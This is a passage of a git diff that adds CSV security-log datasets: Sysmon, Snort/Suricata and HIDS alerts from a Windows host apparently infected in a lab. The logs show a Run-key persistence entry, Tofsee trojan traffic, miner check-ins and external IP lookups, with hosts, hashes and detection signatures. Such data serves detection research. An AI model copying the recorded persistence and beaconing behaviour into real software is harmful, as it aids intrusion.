Williams\ccdojkiq.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mxyxziig","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:24.766137000Z"",""eventRecordID"":""1998"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:49:24.759\r\nProcessGuid: {df9fc3d3-b353-5ecf-0000-0010b8a01800}\r\nProcessId: 6208\r\nImage: C:\\Users\\John Williams\\Downloads\\Program27.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mxyxziig\r\nDetails: \""C:\\Users\\John Williams\\ccdojkiq.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:49:24.759"",""processGuid"":""{df9fc3d3-b353-5ecf-0000-0010b8a01800}"",""processId"":""6208"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program27.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\mxyxziig"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\ccdojkiq.exe\\\""""}}}","\""C:\\Users\\John Williams\\ccdojkiq.exe\""" diff --git a/data/MW_27_NIDS.csv b/data/MW_27_NIDS.csv new file mode 100644 index 0000000..1082e0f --- /dev/null +++ b/data/MW_27_NIDS.csv @@ -0,0 +1,87 @@ +"@timestamp",message,"log.file.path" +"May 30, 2020 @ 15:42:52.321","05/30/2020-15:42:42.345854 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50911 -> 83.151.238.37:8080","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:42:52.321","05/30-15:42:42.345854 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50911 -> 83.151.238.37:8080","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:30:18.508","05/30-15:30:10.472068 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:49847","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:30:11.415","05/30/2020-15:30:10.735915 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:49847","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:56.400","05/30/2020-15:29:49.941742 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:56.400","05/30/2020-15:29:49.942032 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.38.21:443 -> 172.16.2.2:49830","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:56.399","05/30/2020-15:29:49.941742 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:53.491","05/30-15:29:49.925547 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49830 -> 216.239.38.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:29:38.487","05/30-15:29:31.033776 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49798 -> 104.28.8.113:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:29:31.386","05/30/2020-15:29:31.194422 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49798 -> 104.28.8.113:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:24.383","05/30/2020-15:29:22.356977 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49791 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:29:23.477","05/30-15:29:22.197701 [**] [1:2805815:3] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49791 -> 66.171.248.178:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:28:39.314","05/30/2020-15:28:35.054370 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49748 -> 184.73.165.106:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:28:39.314","05/30/2020-15:28:35.524656 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49749 -> 104.28.8.113:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:28:38.447","05/30-15:28:34.812354 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49748 -> 184.73.165.106:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:28:38.447","05/30-15:28:35.354784 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49749 -> 104.28.8.113:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:19.287","05/30/2020-15:27:17.870873 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 23.21.59.179:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:11.649345 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:11.904282 [**] [1:2805815:3] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49714 -> 66.171.248.178:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:18.429","05/30-15:27:17.714317 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 23.21.59.179:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:16.285","05/30/2020-15:27:15.116649 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49714 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:11.713087 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:11.713087 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49715 -> 216.239.32.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:13.283","05/30/2020-15:27:12.203164 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.32.21:443 -> 172.16.2.2:49715","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:06.280","05/30/2020-15:27:02.337637 [**] [1:2021378:4] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49713 -> 162.88.193.70:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:06.280","05/30/2020-15:27:03.377473 [**] [1:2014932:2] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 162.88.193.70:80 -> 172.16.2.2:49713","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:27:03.426","05/30-15:27:02.241052 [**] [1:2021378:1] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49713 -> 162.88.193.70:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:03.426","05/30-15:27:02.337246 [**] [1:2014932:1] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 162.88.193.70:80 -> 172.16.2.2:49713","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:27:00.425","05/30-15:26:56.019479 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49712 -> 83.151.238.37:8080","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:26:59.279","05/30/2020-15:26:56.019479 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49712 -> 83.151.238.37:8080","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:26:45.421","05/30-15:26:35.698016 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:49709","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:26:44.276","05/30/2020-15:26:35.837593 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:49709","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:25:00.399","05/30-15:24:58.643003 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50218 -> 216.239.38.21:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:59.242","05/30/2020-15:24:58.914084 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50218 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:58.241","05/30/2020-15:24:56.556075 [**] [1:2832022:2] ETPRO HUNTING Observed Suspicious SSL Cert (External IP Address Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 23.128.64.141:443 -> 172.16.2.2:50215","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:57.373","05/30-15:24:56.240847 [**] [1:2832022:2] ETPRO POLICY Observed Suspicious SSL Cert (External IP Address Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 23.128.64.141:443 -> 172.16.2.2:50215","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:55.192","05/30/2020-15:24:54.000884 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50213","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:54.368","05/30-15:24:53.835206 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50213","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:52.188","05/30/2020-15:24:50.727074 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50211 -> 172.67.135.19:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:51.259","05/30-15:24:50.585847 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50211 -> 172.67.135.19:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:49.187","05/30/2020-15:24:47.215798 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50209 -> 185.255.55.29:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:49.187","05/30/2020-15:24:47.536169 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50209","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:48.258","05/30-15:24:47.202292 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50209 -> 185.255.55.29:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:48.258","05/30-15:24:47.215198 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50209","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:47.244","05/30-15:24:45.564938 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50207","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:47.243","05/30-15:24:45.529777 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50207 -> 185.255.55.29:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:46.185","05/30/2020-15:24:45.565802 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50207 -> 185.255.55.29:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:46.185","05/30/2020-15:24:45.824744 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50207","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:43.184","05/30/2020-15:24:42.402484 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50204 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:43.184","05/30/2020-15:24:42.992321 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50205","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:40.235","05/30-15:24:39.591367 [**] [1:2017398:3] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50202 -> 116.202.244.153:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:40.171","05/30/2020-15:24:39.665755 [**] [1:2017398:5] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50202 -> 116.202.244.153:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:39.170","05/30/2020-15:24:35.273781 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50197 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:33.211","05/30-15:24:32.311010 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50197 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:32.204","05/30-15:24:30.430222 [**] [1:2027905:2] ET POLICY External IP Lookup (api .ipaddress .com) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50195 -> 209.126.119.224:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:32.166","05/30/2020-15:24:30.682351 [**] [1:2027905:2] ET POLICY External IP Lookup (api .ipaddress .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50195 -> 209.126.119.224:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:29.201","05/30-15:24:25.283415 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50186","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:29.201","05/30-15:24:28.207581 [**] [1:2834195:2] ETPRO POLICY External IP Address Lookup via ifconfig .co [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 172.67.133.228:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:29.164","05/30/2020-15:24:28.408430 [**] [1:2834195:2] ETPRO POLICY External IP Address Lookup via ifconfig .co [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50188 -> 172.67.133.228:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:29.163","05/30/2020-15:24:25.518788 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50186","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:22.171","05/30-15:24:21.245683 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50183","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:22.157","05/30/2020-15:24:21.413626 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50183","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:21.168","05/30-15:24:18.884632 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50181 -> 54.221.234.156:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:21.150","05/30/2020-15:24:19.069825 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50181 -> 54.221.234.156:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:14.166","05/30-15:24:13.089792 [**] [1:2017398:3] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50177 -> 116.202.244.153:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:14.148","05/30/2020-15:24:13.113190 [**] [1:2017398:5] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50177 -> 116.202.244.153:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:23:39.154","05/30-15:23:35.321386 [**] [1:2838238:2] ETPRO POLICY External IP Lookup (api .rest7 .com) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50155 -> 37.28.155.134:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:23:39.141","05/30/2020-15:23:36.602663 [**] [1:2838238:2] ETPRO POLICY External IP Lookup (api .rest7 .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50155 -> 37.28.155.134:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:54.116","05/30-15:21:43.836141 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:44.099","05/30/2020-15:21:43.878035 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:44.099","05/30/2020-15:21:43.915646 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.38.21:443 -> 172.16.2.2:50061","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:44.098","05/30/2020-15:21:43.878035 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.130789 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.133270 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.148124 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50049 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.217621 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50050 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.223636 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.267732 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50052 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.192755 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.204170 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50049 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.265972 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50050 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.272192 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.327487 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50052 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.096","05/30/2020-15:21:26.196569 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:22.099","05/30-15:21:17.696236 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50023 -> 83.151.238.37:8080","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:22.094","05/30/2020-15:21:17.696236 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50023 -> 83.151.238.37:8080","/var/log/suricata/fast.log" diff --git a/data/MW_28_HIDS_3.csv b/data/MW_28_HIDS_3.csv new file mode 100644 index 0000000..96bc2f2 --- /dev/null +++ b/data/MW_28_HIDS_3.csv @@ -0,0 +1,63 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 09:40:28.905",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 5152; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : select ChassisTypes from Win32_SystemEnclosure; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 31, 2020 @ 09:38:58.566",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'd2abb0e472c53cbf65d10a1f2d09aa79' +New md5sum is : '9cff44496a5ed58ecd06ce03fe6410f8' +Old sha1sum was: '940d447005e78e8bd3cb6f655847dc7810917403' +New sha1sum is : '19ebed2ea7007c5bd2580630b03830bb0b2dee87' +", +"May 31, 2020 @ 09:38:58.544",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'e064d552ab7f45ac175a32c6fadfae16' +New md5sum is : '09f9a868702d8a69d4b62b6dc4365b29' +Old sha1sum was: '14398c675c8587716a103632fb0302df5f37982d' +New sha1sum is : '4c3792c463152bc8effee78473d7f3b3c0e8e25e' +", +"May 31, 2020 @ 09:37:34.023",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not 